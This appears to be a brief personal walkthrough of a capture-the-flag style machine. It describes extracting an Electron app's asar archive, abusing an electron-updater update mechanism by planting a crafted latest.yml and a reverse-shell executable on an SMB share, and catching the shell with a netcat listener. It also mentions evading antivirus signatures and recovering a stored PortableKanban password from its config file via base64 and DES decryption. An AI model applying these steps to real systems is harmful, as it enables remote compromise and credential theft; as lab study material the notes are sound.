Electron App (decompile and find secrets!)
auto update feature
Download the setup zip file with smb/ftp
and extract it ---> plugin folder
1.app-64.7z -> 7z x app_64.7z to extract it.
1.app.asar ->sudo npm g install asar
asar l app.asar (lists files)
asar ef app.asar main.js (this command extracts a main.js file from the app)
asar e app.asar $(pwd) - extracts everything?
Google electron updater RCE exploit.
the apostrofe can evade AV sig.
modify the exploit
sha512sum rev.exe | awk '{print $1}' | xxd -r -p | base64 -w 0
paste the sha512
smbclient //IP/Software_Updates
put latest.yml
put rev.exe
and set up a nc listener
///
Priv Esc:
PortableKanban
Portablekanban.config
Read the config and se theDbport & DbEncpassword
go to cyberchef website and decrypt the pass.
copy the enc pass and select from base64 option
copy the DES key.
drag and drop decrypt DES key (
it uses redis
decrypt the pass with the same config on the cybershef.
Last updated